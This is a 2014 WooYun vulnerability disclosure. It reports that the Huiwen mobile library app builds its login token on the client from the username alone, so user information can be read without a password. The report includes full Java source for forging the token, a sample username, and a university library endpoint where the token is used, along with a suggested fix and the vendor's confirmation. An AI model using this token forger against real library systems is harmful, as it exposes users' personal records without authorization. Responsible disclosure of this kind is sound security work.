当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084928

漏洞标题:汇文手机图书馆不用密码获取用户信息

相关厂商:libsys.com.cn

漏洞作者: 路人甲

提交时间:2014-12-01 18:41

修复时间:2015-03-01 18:42

公开时间:2015-03-01 18:42

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-01: 细节已通知厂商并且等待厂商处理中
2014-12-02: 厂商已经确认,细节仅向厂商公开
2014-12-05: 细节向第三方安全合作伙伴开放
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-03-01: 细节向公众公开

简要描述:

生成认证token,只用用户名即可获取用户信息

详细说明:

将用于认证的token的生成方式在客户端实现且生成方式与密码无关
影响院校列表 http://www.libsys.com.cn/huiwen_app_center_2.php

漏洞证明:

import java.io.UnsupportedEncodingException;
import java.math.BigInteger;
/**
 * Created by snail on 14-11-23.
 */
public class LibToken {
    public static String makeToken(String s) {
        int k, l, i1, j1, k1;
        String s1, s2, s3, s4, s5;
        StringBuffer stringBuffer;
        byte abyte0[] = null;
        try {
            abyte0 = s.getBytes("utf-8");
        } catch (UnsupportedEncodingException e) {
            return null;
        }
        s1 = "";
        for (l = 0; l < abyte0.length; l++) {
            s2 = Integer.toHexString(0xff & abyte0[l]);
            if (s2.length() == 1) {
                s1 = (new StringBuilder(String.valueOf(s1))).append("0").append(s2).toString();
            } else {
                s1 = (new StringBuilder(String.valueOf(s1))).append(s2).toString();
            }
            // System.out.println(l+"-->s1-->"+s1+"s2-->"+s2);
        }
        //System.out.println("s1------>"+s1);
        s4 = s1.toUpperCase();
        stringBuffer = new StringBuffer("");
        for (i1 = 0; i1 < s4.length(); i1++) {
            stringBuffer.append(s4.charAt(i1));
            if ((i1 % 2 == 0) && (i1 != 0) && (i1 < 12)) {
                stringBuffer.append((int) (10D * Math.random()));
            }
        }
        //System.out.println("stringBuffer.toString()--->"+stringBuffer.toString());
        s5 = b(stringBuffer.toString());
        //System.out.println("s5--->"+s5);
        j1 = 0;
        for (k = 0; k < s5.length(); k++) {
            j1 += Integer.parseInt((new StringBuilder()).append(s5.charAt(k)).toString());
        }
        //System.out.println("j1---->"+j1);
        k1 = j1 % 36;
        if ((k1 <= 10) || (k1 == 16))
            k1 = 18;
        return (new StringBuilder(String.valueOf(a(s5, k1)))).append(a(k1)).toString();
    }
    public static String a(String s, int k) {
        //	System.out.println("s--->"+s+"---k-->-"+k);
        BigInteger bigIntegerArray[] = new BigInteger[500];
        for (int l = 0; l < 100; l++) {
            bigIntegerArray[l] = new BigInteger("0");
        }
        BigInteger bi, bi1, bi2;
        bi = new BigInteger(s);
        bi1 = new BigInteger(String.valueOf(k));
        bi2 = bi;
        int i1;
        for (i1 = 0; bi2.toString().length() != 1 || bi2.intValue() != 0; i1++) {
            bigIntegerArray[i1] = bi2.mod(bi1);
            bi2 = bi2.subtract(bigIntegerArray[i1]).divide(bi1);
        }
        for (int j1 = i1 - 1, k1 = 0; k1 < i1 / 2; k1++, j1--) {
            BigInteger bi3 = bigIntegerArray[k1];
            bigIntegerArray[k1] = bigIntegerArray[j1];
            bigIntegerArray[j1] = bi3;
        }
        String s1 = "";
        for (int l1 = 0; l1 < i1; l1++) {
            s1 = (new StringBuilder((String.valueOf(s1)))).append(a(Long.parseLong(bigIntegerArray[l1].toString()))).toString();
        }
        //	System.out.println("s1-->"+s1);
        return s1;
    }
    public static String a(long l) {
        if (l < 10L) {
            //System.out.println("a00--->"+String.valueOf(l));
            return String.valueOf(l);
        }
        if (l < 36L) {
            //System.out.println("a11--->"+String.valueOf((char) (int) (65L + (l - 10L))));
            return String.valueOf((char) (int) (65L + (l - 10L)));
        } else
            return "";
    }
    public static String b(String s) {
        BigInteger bi1 = new BigInteger(String.valueOf(16));
        BigInteger bi2 = new BigInteger("0");
        BigInteger bi3 = bi2;
        for (int k = 0; k < s.length(); k++) {
            char c1 = s.charAt(k);
            int m;
            if ((c1 >= '0') && (c1 <= '9')) {
                m = Integer.parseInt(String.valueOf(c1));
            } else if ((c1 >= 'A') && (c1 <= 'Z')) {
                m = 10 + (c1 - 'A');
            } else {
                m = -1;
            }
            bi3 = bi3.add(bi1.pow(-1 + (s.length() - k)).multiply(new BigInteger(String.valueOf(m))));
        }
        //System.out.println("bi3-->"+bi3.toString());
        return bi3.toString();
    }
    public static void main(String[] args){
        System.out.println("token--->"+LibToken.makeToken("1114011xx,扬州大学"));
    }
}


将生成的token用到
http://opac.yzu.edu.cn:8081/m/mobile/rinfo.php?token=xxx

修复方案:

将token生成方式在服务器端生成 或者 token生成与密码有关

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-12-02 10:08

厂商回复:

谢谢,我们会尽快修复漏洞

最新状态:

暂无